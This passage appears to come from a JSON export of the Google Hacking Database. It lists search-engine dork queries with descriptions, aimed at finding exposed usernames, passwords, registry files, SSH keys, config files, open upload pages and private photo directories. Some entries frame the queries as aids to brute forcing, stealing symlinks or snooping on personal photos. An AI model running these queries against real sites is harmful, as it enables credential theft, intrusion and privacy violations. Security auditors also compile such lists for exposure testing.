"Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations..."}, {"dork": "inurl:admin inurl:userlist", "description": "This search reveals userlists of administrative importance. Userlists found using this method can range from benign \"message group\" lists to system userlists containing passwords."}, {"dork": "inurl:admin filetype:asp inurl:userlist", "description": "This search reveals userlists of administrative importance. Userlists found using this method can range from benign \"message group\" lists to system userlists containing passwords."}, {"dork": "\"index of\" / lck", "description": "These lock files often contain usernames of the user that has locked the file. Username harvesting can be done using this technique."}, {"dork": "index.of perform.ini", "description": "This file contains information about the mIRC client and may include channel and user names."}, {"dork": "inurl:php inurl:hlstats intext:\"Server Username\"", "description": "This page shows the halflife stat script and reveals the username to the system. Table structure, database name and recent SQL queries are also shown on most systems."}, {"dork": "filetype:reg reg HKEY_CURRENT_USER username", "description": "This search finds registry files from the Windows Operating system. Considered the \"soul\" of the system, these files, and snippets from these files contain sensitive information, in this case usernames and/or passwords."}, {"dork": "filetype:reg reg +intext:\"internet account manager\"", "description": "This google search reveals users names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases."}, {"dork": "filetype:log username putty", "description": "These log files record info about the SSH client PUTTY. These files contain usernames, site names, IP addresses, ports and various other information about the SSH server connected to."}, {"dork": "filetype:conf inurl:proftpd.conf -sample", "description": "A standard FTP configuration file that provides far too many details about how the server is setup, including installation paths, location of logfiles, generic username and associated group, etc"}, {"dork": "inurl:root.asp?acs=anon", "description": "This search jumps right to the main page of Outlook Web Access Public Folders and the Exchange Address Book:.An attacker can use the addressbook to enumerate usernames anonymously without having to logon. These usernames can then be used to guess the mailbox passwords. An attacker can also browse the public folders to gather extra information about the organisation."}, {"dork": "site:extremetracking.com inurl:\"login=\"", "description": "The search reveals usernames (right in the URL in green) and links to the sites that are signed up with extremetracking.com. From here an attacker can view any of the sites stats, including all the visitors to the site that is being tracked, including their IP adresses."}, {"dork": "inurl:/profile.php?lookup=1", "description": "inurl:/profile.php?lookup=1\nThis google dork will help find administrator name in most websites and forums..Very helpful in brute forcing ...\nCreated SIVABALAN ( De King OF CYber )"}, {"dork": "\"authentication failure; logname=\" ext:log", "description": "Finds log files for failed logins, containing usernames and login paths.\nDxtroyer"}, {"dork": "\"username.xlsx\" ext:xlsx", "description": "\"username.xlsx\" ext:xlsx\r\n\r\nexcel files containing username\r\n\r\nManhNho"}, {"dork": "intitle:index.of \"users.db\"", "description": "dork:\r\nintitle:index.of \"users.db\"\r\n\r\nAuthor:Mayur Parmar(th3cyb3rc0p)"}, {"dork": "intitle:\"index of\" service.grp", "description": "# Google Dork: intitle:\"index of\" service.grp\r\n\r\n# By using this dork it's possible to find some admin usernames in\r\nplain-text.\r\n\r\n# Date: 13/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintext:username filetype:log", "description": "# Dork : allintext:username filetype:log\r\n# This Dork will show lot of results that include usernames inside all .log files.\r\n# Author : Shivanshu Sharma\r\n\r\nSent from Mail for Windows 10"}, {"dork": "intitle:\"index of\" \"users.sql\"", "description": "# Dork :intitle:\"index of\" \"users.sql\"\r\n# Sensitive informations : User Names and Password\r\n# Author : Ambadi MP"}, {"dork": "intitle:\"index of\" \"/ftpusers\"", "description": "Title: File containing juicy info\r\nGoogle Dork: intitle:\"index of\" \"/ftpusers\"\r\nDate: 02/07/2020\r\nAuthor : Mohit Khemchandani"}, {"dork": "intitle:\"index of\" \"tomcat-users.xml\"", "description": "Description: intitle:\"index of\" \"tomcat-users.xml\"\r\nThis google dork gives us the web server apache tomcat username, password,\r\nroles details."}, {"dork": "\"index of\" \"users.frm\"", "description": "# Google Dork: \"index of\" \"users.frm\"\r\n# Description :- Disclosure of database file tables and sensitive files.\r\n# Date: 13/09/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n# Twitter: https://twitter.com/Sahil_delinitor\r\n# GitHub: https://github.com/Sahil-69\r\n# Bugcrowd: https://bugcrowd.com/Prickn\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "File contains Sensitive Information", "description": "Google Dorks: \"index of\" \"*.usernames.txt\"\r\n\r\nCategory: File contains Sensitive Information\r\n\r\nAuthor: Abishekraghav Murugeashan\r\n\r\nLinkedIn: https://www.linkedin.com/in/arhaxor21/"}, {"dork": "\"CREATE ROLE\" + \"ENCRYPTED PASSWORD\" ext:sql | ext:txt | ext:ini -git -gitlab", "description": "# Google Dork: \"CREATE ROLE\" + \"ENCRYPTED PASSWORD\" ext:sql | ext:txt | ext:ini -git -gitlab\r\n\r\n# Exposed usernames, passwords and more...\r\n\r\n# Date: 9/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/parameters.yml*\"", "description": "# Google Dork: intitle:\"index of\" \"/parameters.yml*\"\r\n\r\n# Files containing usernames and passwords.\r\n\r\n# Date: 17/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:java -git -gitlab", "description": "# Google Dork: jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:java -git -gitlab\r\n# Exposed usernames and passwords.\r\n# Date: 20/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:user intitle:index of ext:sql | xls | xml | json | csv", "description": "# Title: Sensitive Data Exposure\r\n# Google Dork: inurl:user intitle:index of ext:sql | xls | xml | json | csv\r\n# Date: 2020-09-24\r\n\r\n# Author: Virendra Tiwari\r\n# LinkedIn: https://www.linkedin.com/in/virendratiwari/\r\n\r\nThanks and Regards,\r\nVirendra Tiwari"}, {"dork": "filetype:csv intext:\"Secret access key\"", "description": "# Dork: filetype:csv intext:\"Secret access key\""}, {"dork": "\"DefaultPassword\" ext:reg \"[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]\"", "description": "# Google Dork: \"DefaultPassword\" ext:reg \"[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]\"\r\n\r\n# Exposed default usernames and passwords in Windows registry.\r\n\r\n# Date: 10/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"filezilla.xml\"", "description": "# Google Dork: intitle:\"index of\" \"filezilla.xml\"\r\n\r\n# Sensitive directories containing many times usernames and passwords.\r\n\r\n# Date: 5/11/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"sitemanager.xml\" | \"recentservers.xml\"", "description": "# Google Dork: intitle:\"index of\" \"sitemanager.xml\" | \"recentservers.xml\"\r\n# Sensitive directories containing many times usernames and passwords.\r\n# Date: 9/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"password.yml", "description": "#Google Dork : intitle:\"index of\" \"password.yml\"\r\n#Exploit Title : usernames and passwords can be found.\r\n#Date : 17/11/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "jdbc:sqlserver://localhost:1433 + username + password ext:yml | ext:java", "description": "# Google Dork: jdbc:sqlserver://localhost:1433 + username + password ext:yml | ext:java\r\n# Exposed usernames and passwords.\r\n# Date: 9/1/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"'dsn: mysql:host=localhost;dbname=\" ext:yml | ext:txt \"password:\"", "description": "# Google Dork: \"'dsn: mysql:host=localhost;dbname=\" ext:yml | ext:txt \"password:\"\r\n# Exposed usernames and passwords.\r\n# Date: 9/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"credentials.xml\" | \"credentials.inc\" | \"credentials.txt\"", "description": "# Google Dork: intitle:\"index of\" \"credentials.xml\" | \"credentials.inc\" | \"credentials.txt\"\r\n# Files containing usernames and passwords.\r\n# Date: 19/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"db.properties\" | \"db.properties.BAK\"", "description": "# Google Dork: intitle:\"index of\" \"db.properties\" | \"db.properties.BAK\"\r\n\r\n# Files containing usernames and passwords.\r\n\r\n# Date: 27/11/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"contacts.txt\"", "description": "# Google Dork: intitle:\"index of\" \"contacts.txt\"\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: Axel Meneses"}, {"dork": "intext:\"-----BEGIN CERTIFICATE-----\" ext:txt", "description": "# Google Dork: intext:\"-----BEGIN CERTIFICATE-----\" ext:txt\r\n\r\n# Pages Files Containing Juicy Info\r\n\r\n# Date: 13/08/2021\r\n\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"index of\" \"/usernames\"", "description": "# Google Dork: intitle:\"index of\" \"/usernames\"\r\n# Files Containing Usernames\r\n# Date: 24/08/2021 \r\n# Exploit Author: Priyanshu Choudhary"}], "Sensitive Directories": [{"dork": "index.of.secret", "description": "What kinds of goodies lurk in directories marked as \"secret?\" Find out..."}, {"dork": "index.of.private", "description": "What kinds of things might you find in directories marked \"private?\" let's find out...."}, {"dork": "index.of.secure", "description": "What could be hiding in directories marked as \"secure?\" let's find out..."}, {"dork": "index.of.protected", "description": "What could be in a directory marked as \"protected?\" Let's find out..."}, {"dork": "intitle:\"index.of.personal\"", "description": "This directory has various personal documents and pictures."}, {"dork": "inurl:explorer.cfm inurl:(dirpath|This_Directory)", "description": "Filemanager without authentication."}, {"dork": "intitle:\"index of\" intext:\"content.ie5\"", "description": "This dork indicates the \"Local settings\" dir in most cases, and browseble server directories in general."}, {"dork": "allinurl:\"/*/_vti_pvt/\" | allinurl:\"/*/_vti_cnf/\"", "description": "Frontpage extensions for Unix ? So be it.."}, {"dork": "intitle:upload inurl:upload intext:upload -forum -shop -support -w3c", "description": "The search reveals server upload portals.An attacker can use server space for his own benefit."}, {"dork": "\"Index of\" rar r01 nfo Modified 2004", "description": "New Warez Directory Lists"}, {"dork": "intitle:index.of /maildir/new/", "description": "search gives you a mailbox dir. Contains a lot of mails."}, {"dork": "intitle:\"Backup-Management (phpMyBackup v.0.4 beta * )\" -johnny.ihackstuff", "description": "phpMyBackup is an mySQL backup tool, with features like copying backups to a different server using FTP."}, {"dork": "intitle:\"Folder Listing\" \"Folder Listing\" Name Size Date/Time File Folder", "description": "directory listing for Fastream NETFile Web Server"}, {"dork": "\"Directory Listing for\" \"Hosted by Xerver\"", "description": "directory listing for Xerver web server"}, {"dork": "\"Welcome to the directory listing of\" \"NetworkActiv-Web-Server\"", "description": "this is for NetworkActiv-Web-Server directory listing"}, {"dork": "\"Warning: Installation directory exists at\" \"Powered by Zen Cart\" -demo", "description": "by this dork you can find fresh installations of Zen-Cartsee Full Disclosure forums fore details... ;)"}, {"dork": "inurl:install.pl intext:\"Reading path paramaters\" -edu", "description": "Excelent information for foot holds. Everything from OS, to forum software, etc. Other exploits possible"}, {"dork": "intitle:index.of cisco asa -site:cisco.com", "description": "Google search for Pix/Asa images \nAuthor: fdisk"}, {"dork": "intitle:index.of ios -site:cisco.com", "description": "Google search for Cisco IOS images\nAuthor: fdisk"}, {"dork": "allintext:\"WebServerX Server at\"", "description": "Quick and dirty WebserverX HTTP server google dork"}, {"dork": "\"Index of /backup\"", "description": "Backup directories are often very interesting places to explore. More than one server has been compromised by a hacker's discovery of sensitive information contained in backup files or directories. Some of the sites in this search meant to reveal the contents of their backup directories, others did not. Think about it. What.s in YOUR backup directories? Would you care to share the contents with the whole of the online world? Probably not. Whether intentional or not, bsp.gsa.gov reveals backup directory through Google. Is this simply yet another misconfigured .gov site? You decide. BSP stands for \"best security practices,\" winning this site the Top GoogleDork award for this category."}, {"dork": "\"index of\" inurl:root intitle:symlink", "description": "Google Dork: index of\" inurl:root intitle:symlink\nSteal Others Symlink\nAuthor: Un0wn_X"}, {"dork": "inurl:8080 intitle:\"Dashboard [Jenkins]\"", "description": "#Summary: Acces to Jenkins Dashboard\n#Author: g00gl3 5c0u7"}, {"dork": "inurl:/cgi-bin/.cgi", "description": "Finds open index of /cgi-bin."}, {"dork": "\"Config\" intitle:\"Index of\" intext:vpn", "description": "Directory with keys of vpn servers.\nBy Rootkit."}, {"dork": "intitle:index.of +\"Indexed by Apache::Gallery\"", "description": "Google dork for finding Private pics ;) :D\n#13lacKDemOn"}, {"dork": "intitle:index.of.accounts", "description": "Dork for directory with accounts.\nBy Rootkit."}, {"dork": "intitle:index.of.dropbox", "description": "Sensitive Directories\nAriel Anonis - @ariel_anonis"}, {"dork": "inurl:private_files", "description": "Directory private files xD.\nBy Rootkit."}, {"dork": "intitle:\"Index Of\" intext:\"iCloud Photos\" OR intext:\"My Photo Stream\" OR intext:\"Camera Roll\"", "description": "From: Creep Mode Baby"}, {"dork": "intitle:\"Index of\" \"wwwroot\"", "description": "Directory of wwwroot Dork. Enjoy xD.\nBy Rootkit."}, {"dork": "intitle:\"Index of\" \"DCIM\"", "description": "A lot of Camera Photos Dump.\nHave Fun!.\nRootkit."}, {"dork": "intitle:\"Index of\" \"WhatsApp Images\"", "description": "WhatsApp Images folder, usually from backups.\n--pmbento"}, {"dork": "mail spool intitle:index.of", "description": "Dork for mail spools.\nDecoy"}, {"dork": "inurl:.listing intitle:index.of", "description": "Directories with .listing files.\nBy Rootkit Pentester."}, {"dork": "inurl:.DS_Store intitle:index.of", "description": "Directories with DS_Store files.\nBy Rootkit Pentester."}, {"dork": "\"sql\" \"parent\" intitle:index.of -injection", "description": "Directories containing SQL Installs and/or SQL databases...\nDecoy"}, {"dork": "intitle:index.of inurl:grades site:edu", "description": "Directories containing grades.\nDecoy"}, {"dork": "inurl:\"wp-content/uploads/private\"", "description": "Directories with juicy data.\nDork by Rootkit Pentester."}, {"dork": "inurl:pipermail intitle:index.of parent", "description": "Pipermail Archives\nDecoy"}, {"dork": "intitle:index.of.mail", "description": "Dork with juicy info. Enjoy xD.\nDork by Rootkit Pentester."}, {"dork": "inurl:.ssh intitle:index.of authorized_keys", "description": "SSH Keys\ninurl:.ssh intitle:index.of authorized_keys\nDecoy"}, {"dork": "inurl:\"folderview?id=\" site:drive.google.com", "description": "Finds people's private folders on Google Drive\nDxtroyer"}, {"dork": "inurl:\"/drive/folders/\" site:drive.google.com", "description": "Google Drive folders\n-Xploit"}, {"dork": "-inurl:htm -inurl:html intitle:\"index of\" 100CANON", "description": "Explore the Images and photos uploaded and saved in Directories from Canon\nDSLRs and Camera @Reveal2Maviya #Reveal2Maviya\n\"-inurl:htm -inurl:html intitle:\"index of\" 100CANON\""}, {"dork": "-inurl:htm -inurl:html intitle:\"index of\" NIKON", "description": "Explore the Images and photos uploaded and saved in Directories from Nikon\nDSLRs and Camera @Reveal2Maviya #Reveal2Maviya\n-inurl:htm -inurl:html intitle:\"index of\" NIKON"}, {"dork": "intitle:\"Index of /\" \"joomla_update.php\"", "description": "Finds directories with Joomla logs, often containing juicy info\nDxtroyer"}, {"dork": "index of /htdocs", "description": "Which is used to find unauthorised web-servers,and find all sensitive info\nthrough 'htdocs' folder. Also can find xamp servers.\nDagalti Kick"}, {"dork": "\"m.zippyshare.com/\"", "description": "maybe directory trick listener i dont know but useful :)\ntype on google this this form.: \"m.zippyshare.com/\"\n- zoltan"}, {"dork": "inurl:admin inurl:uploads", "description": "Fishes images and text from upload sites\r\n\r\n\r\n\r\n- Toby"}, {"dork": "intitle:index.of intext:viewvc", "description": "ViewVC is a browser interface for CVS and Subversion version control\nrepositories. This dork allows you to list those that are indexed and open\nfor viewing.\nSome contain source code, private SSH keys, configuration files, and more.\n--\nparagonsec"}, {"dork": "inurl:/xampp", "description": "this dork looks for servers with xampp installed"}, {"dork": "index.of.winnt", "description": "The \\WINNT directory is the directory that Windows NT is installed into by default. Now just because google can find them, this doesn't necessarily mean that these are Windows NT directories that made their way onto the web. However, sometimes this happens. Other times, they aren't Windows NT directories, but backup directories for Windows NT data. Wither way, worthy of a nomination."}, {"dork": "index.of.password", "description": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn..."}, {"dork": "inurl:backup intitle:index.of inurl:admin", "description": "This query reveals backup directories. These directories can contain various information ranging from source code, sql tables, userlists, and even passwords."}, {"dork": "\"Welcome to phpMyAdmin\" \" Create new database\"", "description": "phpMyAdmin is a widly spread webfrontend used to mantain sql databases. The default security mechanism is to leave it up to the admin of the website to put a .htaccess file in the directory of the application. Well gues what, obviously some admins are either too lazy or don't know how to secure their directories. These pages should obviously not be accessable to the public without some kind of password ;-)"}, {"dork": "intitle:\"Index of c:\\Windows\"", "description": "These pages indicate that they are sharing the C:\\WINDOWS directory, which is the system folder for many Windows installations."}, {"dork": "intitle:\"Index of\" cfide", "description": "This is the top level directory of ColdFusion, a powerful web development environment. This directory most likely contains sensitive information about a ColdFusion developed site."}, {"dork": "\"index of cgi-bin\"", "description": "CGI directories contain scripts which can often be exploited by attackers. Regardless of the vulnerability of such scripts, a directory listing of these scripts can prove helpful."}, {"dork": "inurl:j2ee/examples/jsp", "description": "This directory contains sample JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server."}, {"dork": "inurl:ojspdemos", "description": "This directory contains sample Oracle JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server."}, {"dork": "inurl:/pls/sample/admin_/help/", "description": "This is the default installation location of Oracle manuals. This helps in footprinting a server, allowing an attacker to determine software version information which may aid in an attack."}, {"dork": "\"index of\" inurl:recycler", "description": "This is the default name of the Windows recycle bin. The files in this directory may contain sensitive information. Attackers can also crawl the directory structure of the site to find more information. In addition, the SID of a user is revealed also. An attacker could use this in a variety of ways."}, {"dork": "inurl:/tmp", "description": "Many times, this search will reveal temporary files and directories on the web server. The information included in these files and directories will vary, but an attacker could use this information in an information gathering campaign."}, {"dork": "intitle:intranet inurl:intranet +intext:\"human resources\"", "description": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\"This search allows you to not only access a companies private network, but also provides employee listings and other sensitive information that can be incredibly useful for any social engineering endeavour"}, {"dork": "\"Index Of /network\" \"last modified\"", "description": "Many of these directories contain information about the network, though an attacker would need a considerable amount of patience to find it."}, {"dork": "intitle:\"album permissions\" \"Users who can modify photos\" \"EVERYBODY\"", "description": "Gallery (http://gallery.menalto.com) is software that allows users to create webalbums and upload pictures to it. In some installations Gallery lets you access the Admin permission page album_permissions.php without authentication. Even if not \"everybody\" has modify rights, an attacker can do a search for \"users who can see the album\" to retrieve valid usernames for the gallery."}, {"dork": "filetype:cfg ks intext:rootpw -sample -test -howto", "description": "Anaconda is a linux configuration tool like yast on suse linux. The root password is often encrypted - like md5 or read from the shadow. Sometimes an attacker can also get a cleartext password.There are more ks configs then you might expect and with a bit of searching through the result list an attacker can find the root password and own that system."}, {"dork": "intitle:\"index of /phpmyadmin\" modified", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields (http://sourceforge.net/projects/phpmyadmin/).An attacker can use this search to find phpMyAdmin enabled MySQL servers by using the \"index of /\" method. Consider this an alternative way an attacker could find them besides the older Googledorks for phpMyAdmin."}, {"dork": "index.of.password", "description": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This googledork has expired ! See also:http://johnny.ihackstuff.com/index.php?module=ProdReviews&func=showcontent&id=380"}, {"dork": "\"index of\" / picasa.ini", "description": "Picasa is an 'Automated Digital Photo Organizer' recently aquired by Google. This search allows the voyer to browse directories of photos uploaded using the picasa software."}, {"dork": "intext:\"d.aspx?id\" || inurl:\"d.aspx?id\"", "description": "\"The YouSendIt team was formed to tackle a common problem: secure transmission of large documents online without the use of clumsy client software, mail servers with limited storage space, and sharing passwords. By eliminating the size constraints and security risks of sending files by email, YouSendIt has turned the most common form of communication on the Internet into the best method of secure document transimssion.\"This search shows the files that were transmitted. A malicious user could download them from these pages. This company tends to hold the users responsible for content, while at the same time exposing their pages to Google.. way to go guys.."}, {"dork": "intitle:index.of /AlbumArt_", "description": "Directories containing commercial music.AlbumArt_{.*}.jpg are download/create by MS-Windows Media Player in music directory."}, {"dork": "intitle:\"Index of *\" inurl:\"my shared folder\" size modified", "description": "These are index pages of \"My Shared Folder\". Sometimes they contain juicy stuff like mp3's or avi files. Who needs pay sites for music when you got Google ? :) Uhm, well except for the copyright issue."}, {"dork": "intitle:index.of (inurl:fileadmin | intitle:fileadmin)", "description": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The fileadmin directory is the storage for all user data like website templates, graphics, documents and so on. Normally no sensitive data will be stored here except the one made available in restricted areas.Unprotected fileadmin directories can be found by an attacker using this query.Vendor: http://www.typo3.com/"}, {"dork": "intitle:\"webadmin - /*\" filetype:php directory filename permission", "description": "Webadmin.php is a free simple Web-based file manager. This search finds sites that use this software. If left unprotected an attacker files can be modified or added on the server.More info and screenshot at: http://cker.name/webadmin/"}, {"dork": "intitle:\"Directory Listing For\" intext:Tomcat -int", "description": "The Google Hackers Guide explains how to find Apache directory indexes, which are the most common found on the Internet. There are other ways however.This query is a generic search for servers using Tomcat with directory listings enabled. They are a bit more fancy than Apache's default lists and more importantly they will not be found using \"index.of\"."}, {"dork": "index.of.dcim", "description": "The DCIM directory is the default name for a few brands of digital camers. This is not a big network security risk, but like netcams it can reveal juicy details if found on corporate intranets."}, {"dork": "intitle:\"index of\" -inurl:htm -inurl:html mp3", "description": "Yes! I probably have should have told you guys earlier, but this is how ive been getting 100% of my mp3s. It fricken rocks, use it and abuse it. Downfalls to it... a)sometimes you shouldnt include mp3 in the query and getting what you want takes several different methods of searching b)a lot of the time google gives you results and they are not there thanks to good old friend 404 c)finding stuff takes a lot of practice. Goods... a)ive found whole albums b)ive mass downloaded directories of hundreds of songs that i have intrest in c)its exciting seeing the results, like fining treasure."}, {"dork": "\"intitle:Index.Of /\" stats merchant cgi-* etc", "description": "This search looks for indexes with the following subdirectories: stats, merchant, online-store and cgi-local or cgi-bin. These servers have a shopping cart application called softcart in their cgi-local or cgi-bin directory. Reportedly, it is possible to execute arbitrary code by passing a malformed CGI parameter in an HTTP GET request. This issue is known to affect SoftCart version 4.00b."}, {"dork": "intext:\"Powered By: TotalIndex\" intitle:\"TotalIndex\"", "description": "TotalIndex v2.0 is an open source script that is designed to replace the simple, and boring default index page of a site which lists the files in an indexed folder. It's not PW protected so an attacker can browse the files and take what they want."}, {"dork": "intitle:\"index of\" \"parent directory\" \"desktop.ini\" site:dyndns.org", "description": "This search uses desktop.ini to track users with a webserver running on their desktop computers. It can easily be extended to find specific documents."}, {"dork": "\"Powered by Invision Power File Manager\" (inurl:login.php) | (intitle:\"Browsing directory /\" )", "description": "Invision Power File Manager is a popular file management script, written in the popular PHP Scripting Language. It is compatiable with all forms of Unix and Windows and allows the user to control their files via any modern browser."}, {"dork": "intitle:\"Index of /CFIDE/\" administrator", "description": "With ColdFusion, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP.The search that pulls up directory listings we probably shouldn't be seeing.. entering the 'administrator' directory brings up a ColdFusion login screen"}, {"dork": "intitle:index.of abyss.conf", "description": "These directories reveal the configuration file of the abyss webserver. These files can contain passwords."}, {"dork": "intitle:\"index of\" inurl:ftp (pub | incoming)", "description": "Adding \"inurl:ftp (pub | incoming)\" to the \"index.of\" searches helps locating ftp websites. This query can easily be narrowed further with additional keywords."}, {"dork": "intitle:\"HFS /\" +\"HttpFileServer\"", "description": "\"The HttpFileServer is a Java based mechanism for providing web access to a set of files on a server. This is very similar to Apache Directory Indexing but provides the ability to upload files as well.\" http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=1516"}, {"dork": "\"Web File Browser\" \"Use regular expression\"", "description": "This will ask google to search for a php script used to manage files on a server. The script \"Web File Browser\" enables users to change files on the server. The script comes un-protected, which means that anyone who knows the exact path of the php file can have admin access to files on that server."}, {"dork": "filetype:torrent torrent", "description": "Torrent files .. don't expect to find spectacular stuff with this kind of string, this just to shows you can use Google for all kinds of filetypes, not just pdf or html.."}, {"dork": "filetype:ini Desktop.iniintext:mydocs.dll", "description": "This dork finds any webshared windows folder inside my docs. You can change the end bit \"intext:mydocs.dll\" by looking inside any of your your own folders on your pc, looking for the desktop.ini file and add some of the information to the query. For Anouther example - Shell Folders (Favourite etc) filetype:ini Desktop.iniintext:shell32.dllEnjoy"}, {"dork": "intitle:index.of WEB-INF", "description": "Finds java powered web servers which have indexing enabled on their config directory"}, {"dork": "intitle:\"pictures thumbnails\" site:pictures.sprintpcs.com", "description": "This search reveals the photo albums taken by Sprint PCS customers. Pictures taken with Sprint's cell phone service can be shared on their website. This search exposes the thumbnail album, only if the user has elected to share the photo album.Nothing like the Paris Hilton pictures, but there are pictures of people drunk at parties, dancing, girlfriens and so on."}, {"dork": "log inurl:linklint filetype:txt -\"checking\"", "description": "Linklint is an Open Source Perl program that checks links on web sites. This search finds the Linklint log directory. Complete site map able to be recreated, and if you go back one directory you can see all the other files generated by linklint. Thanks to CP for direction."}, {"dork": "allintitle:\"FirstClass Login\"", "description": "allintitle:\"FirstClass Login\" this is for firstclass directory listingsgo to http://[target]/[path]/Search type just ' in search field and you have a list of downloadable files, you don't see all files on server but you can search for a robots.txt with some folders path or other info for site scructure, crawling in this way you have unauthorized access on all files on the target server"}, {"dork": "intitle:index.of.config", "description": "These directories can give information about a web servers configuration. This should never be viewable to the public as some files may contain cleartext of encrypted passwords, depending on the level of security. It can also contain information on various ports, security permisions..etc."}, {"dork": "inurl:ckfinder intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"", "description": "Dork: inurl:ckfinder intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"\nUse this dork to find root directory of CKFinder (all versions) with\nckfinder.html file (used to upload, modify and delete files on the server)\nSubmitted by: CodiObert"}, {"dork": "\"index of\" inurl:sym", "description": "Google Dork: \"index of\" inurl:sym\nYou can Steal the symlinks of other Servers\nAuthor: Un0wn_X"}, {"dork": "intitle:\"index.of\" | inurl:/filemanager/connectors/ intext:uploadtest.html", "description": "Open Custom File Uploader specifically in \"/ FCKeditor/..\" \r\n\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": "inurl:\"/wp-json/\" -wordpress", "description": "Google dork *description: * Sites running WordPress CMS and access to the\r\nwp-json API endpoint which *might* be vulnerable to content injection\r\n\r\n*Google Search: *inurl:\"/wp-json/\" -wordpress\r\n\r\nSubmitted by: Alfie\r\n\r\nWebsite: (https://the-infosec.com)"}, {"dork": "intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1", "description": "# Exploit Title: google dork for apache directory listing by url edit\n# Google Dork: intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1\n in this query you see that text file but by url we can travel in paren directory \n# Date: 11/7/2013\n# Exploit Author: james love india\n# Tested on: windows xp sp2"}, {"dork": "intitle:index.of intext:.bash_history", "description": "the GHDB on subject (intitle:index.of intext:.bash_history) finds all\nhome users directory path indexed. I've test it and google return 943\nresults!\n-Andrea Menin"}, {"dork": "intitle:\"index of\" myshare", "description": "Google search for shared HDD directories or shared directories on servers.\nGives access to often unconsciously shared documents, programs or\nsensitive information.\nAlso are often other directories on these drives accessible.\nDork by :\nredN00ws"}, {"dork": "intitle:\"index of\" intext:\".ds_store\"", "description": "Mac OSX directories\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "allinurl:/hide_my_wp=", "description": "i just found a google dork that is\nfile/path disclosure of\nHide My WP plugin\nGoogle dork - allinurl:/hide_my_wp=\nit will show the plugin file folder and all file.\n thanks\nkamrul hassan arman"}, {"dork": "\"jos_users\" intitle:\"Index of\"", "description": "\"jos_users\" intitle:\"Index of\"\nFiles of configuration of user Joomla servers.\nBy Rootkit."}, {"dork": "inurl:/wp-content/wpbackitup_backups", "description": "Relates to https://wordpress.org/plugins/wp-backitup/\nSensitive data/site rips/db rips in public accessible folders\nMr T3st3r"}, {"dork": "intitle:\"Index of ftp\"", "description": "This dork finds open ftps. This is a base dork, where you can add\nintext:\"ssh/\" for folder search and intext:\"-2015\" for dates and years.\nAuthor:NickiK."}, {"dork": "inurl:wp-admin/ intext:css/", "description": "The dork finds misconfigured WordPress sites.\nAuthor:NickiK."}, {"dork": "intitle:\"index of\" \"onetoc2\" \"one\"", "description": "# Exploit Title: intitle:\"index of\" \"onetoc2\" \"one\"\n# Google Dork: intitle:\"index of\" \"onetoc2\" \"one\"\n# Date: 04/06/2015\n# Exploit Author: Sphearis\n# Vendor Homepage: NA\n# Software Link: NA\n# Version: NA\n# Tested on: ALL\n# CVE : NA\nThis dork allows you to see Onenote files stored in the open(*.one). These\nfiles can be read easily with Onenote or a compatible viewer, no password,\nno encryption.\nThe onetoc2 is added, it's a worthless file but is always inside a 